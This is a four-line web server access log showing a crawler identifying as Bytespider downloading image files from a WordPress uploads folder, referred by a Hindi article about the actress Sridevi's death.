47.128.49.113 - - [20/Oct/2025:09:07:18 -0400] "GET /wp-content/uploads/2018/02/shri-2.jpg HTTP/2.0" 200 96360 "https://hindi.blushin.com/know-the-real-reason-behind-the-demise-of-bollywood-actress-sridevi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.113 - - [20/Oct/2025:09:07:18 -0400] "GET /wp-content/uploads/2018/02/shri-1.jpg HTTP/2.0" 200 80673 "https://hindi.blushin.com/know-the-real-reason-behind-the-demise-of-bollywood-actress-sridevi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.113 - - [20/Oct/2025:09:07:18 -0400] "GET /wp-content/uploads/2018/02/shri-de.png HTTP/2.0" 200 82584 "https://hindi.blushin.com/know-the-real-reason-behind-the-demise-of-bollywood-actress-sridevi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
47.128.49.113 - - [20/Oct/2025:09:07:19 -0400] "GET /wp-content/uploads/2018/02/shri-cover.jpg HTTP/2.0" 200 125204 "https://hindi.blushin.com/know-the-real-reason-behind-the-demise-of-bollywood-actress-sridevi/" "Mozilla/5.0 (compatible; Bytespider; [email protected]) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.0.0 Safari/537.36"
